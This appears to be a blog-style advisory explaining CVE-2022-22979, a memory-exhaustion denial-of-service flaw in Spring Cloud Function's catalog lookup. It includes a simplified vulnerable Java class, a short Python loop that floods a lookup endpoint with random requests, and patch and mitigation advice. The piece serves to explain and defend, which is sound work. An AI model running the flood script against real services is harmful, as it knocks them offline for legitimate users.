CVE-2022-22979 - The Spring Cloud Function Catalog Denial-of-Service Vulnerability Explained

In June 2022, a significant vulnerability was disclosed in the Spring Cloud Function framework. Identified as CVE-2022-22979, this flaw impacts versions *prior to 3.2.6* and enables an attacker to trigger a Denial-of-Service (DoS) through abuse of the catalog lookup functionality. While it doesn’t allow code execution or elevate privileges, it could make your application unavailable to users—something no business wants.

This guide breaks down how the bug works, who should worry, and gives hands-on details, including code snippets and exploit walkthrough. Let’s get into it.

What is Spring Cloud Function?

Spring Cloud Function is a lightweight framework that lets you write business logic as functions and deploy them independently. You can use them with REST APIs, messaging systems, and more.

One critical part of this framework is the Function Catalog, which allows dynamic lookup and invocation of functions by name.

Summary

> In Spring Cloud Function versions prior to 3.2.6, if someone interacts directly with the framework’s lookup method (FunctionCatalog.lookup()), they can repeatedly make new catalog entries. Due to a missing cache size restriction, this grows the internal cache in memory without bounds, which can eventually exhaust system resources and bring the service down — a classic Denial-of-Service scenario.

Affected versions: < 3.2.6

- Attack vector: Exploiting the lookup functionality directly, often via custom endpoints or inadequately secured routes

Here’s a simplified version of what goes wrong

public class FunctionCatalog {
    // Vulnerable: cache is unbounded
    private final Map<LookupKey, FunctionRegistration<?>> functionCache = new ConcurrentHashMap<>();

    public <T> FunctionInvocationWrapper lookup(String name, String type) {
        LookupKey key = new LookupKey(name, type);
        // Caches every new lookup with a new key, no eviction policy
        if (!functionCache.containsKey(key)) {
            FunctionRegistration<?> registration = findFunctionRegistration(name, type);
            functionCache.put(key, registration);
        }
        return functionCache.get(key);
    }
}

Normally, you’d expect the framework to limit this cache size, or not cache invalid keys at all. But here, calling lookup() with many random names and types fills up functionCache endlessly, eventually using all the available memory.

Exploiting the Bug: A Simple DoS Attack

Scenario: Suppose your application exposes function lookup directly (via APIs, for example), and doesn’t block or validate input. An attacker could bombard your service with requests for functions that don’t exist or use random types. Each request grows the internal cache.

Example Exploit

import requests
import string
import random

url = "http://your-app/function-lookup";

while True:
    random_func = ''.join(random.choices(string.ascii_lowercase, k=12))
    random_type = ''.join(random.choices(string.ascii_lowercase, k=8))
    payload = {"functionName": random_func, "type": random_type}
    requests.post(url, json=payload)

Each POST creates a new entry in the vulnerable cache until memory is used up and your app crashes.

Fixing the Issue

Solution: Upgrade to Spring Cloud Function 3.2.6 or higher. The cache in the Function Catalog becomes bounded, preventing unlimited growth.

Commit reference:  
https://github.com/spring-cloud/spring-cloud-function/issues/773

Stay up to date!
- Spring blog announcement


## Mitigation / Workarounds

Do not expose catalog lookup endpoints to untrusted users

- Validate and restrict function names/types against known-good lists

References

- Spring official CVE-2022-22979 notice
- NIST National Vulnerability Database entry
- GitHub Issue #773 – Spring Cloud Function
- Spring Cloud Function 3.2.6 Release Notes

Conclusion

If you’re using Spring Cloud Function before v3.2.6, *this is a must-fix issue*. It’s easy to block, but just as easy to be caught off-guard if you expose function lookup features. Denial-of-Service attacks are simple but devastating; patching now can save downtime later.

Tip: Always validate and sanitize external input, and keep libraries up-to-date!

Timeline

Published on: 06/21/2022 15:15:00 UTC
Last modified on: 06/28/2022 19:12:00 UTC